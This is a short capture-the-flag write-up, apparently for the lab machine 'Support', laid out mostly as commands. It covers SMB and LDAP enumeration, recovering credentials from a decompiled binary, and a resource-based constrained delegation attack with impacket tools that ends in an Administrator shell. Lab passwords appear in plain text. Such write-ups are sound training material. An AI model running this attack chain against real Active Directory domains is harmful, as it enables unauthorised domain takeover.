Ping
Nmap Scans
Nmap Default Scan
Nmap Script and Service Scan
Nmap All Port Scan
DNS Info
dig axfr @10.10.11.174 support.htb any
added in my hosts file
Can see SMB Shares
smbclient -U '' -L \\\\10.10.11.174\\\\
Share support-tools
smbclient -N //10.10.11.174/support-tools
Downloaded all files to my kali
recurse ON
prompt off
mget *
Decompiled the userinfo.exe file and found a encrypted password, the decrypted it and did ldap search
ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | tee ldapsearch.log
Found support’s password
Will use Evil-winrm to get a session as support
evil-winrm -u support -p Ironside47pleasure40Watchful -i support.htb
I can Add machines
Will add computer
impacket-addcomputer support.htb/support -dc-ip 10.10.11.174 -computer-name 'pwned$' -computer-pass 'pwned'
Set delegation rights to new computer
impacket-rbcd -action write -delegate-from pwned$ -delegate-to dc$ -dc-ip 10.10.11.174 "support.htb/support:Ironside47pleasure40Watchful"
TGT ticket to impersonate DC Admin
impacket-getST -spn cifs/dc.support.htb support/pwned\$:'pwned' -impersonate Administrator -dc-ip 10.10.11.174
Will export the ticket to local
export KRB5CCNAME=./Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
Get a shell as NT/Authority
impacket-psexec -k -no-pass dc.support.htb -dc-ip 10.10.11.174
User.txt
Root.txt
Done with Support…:)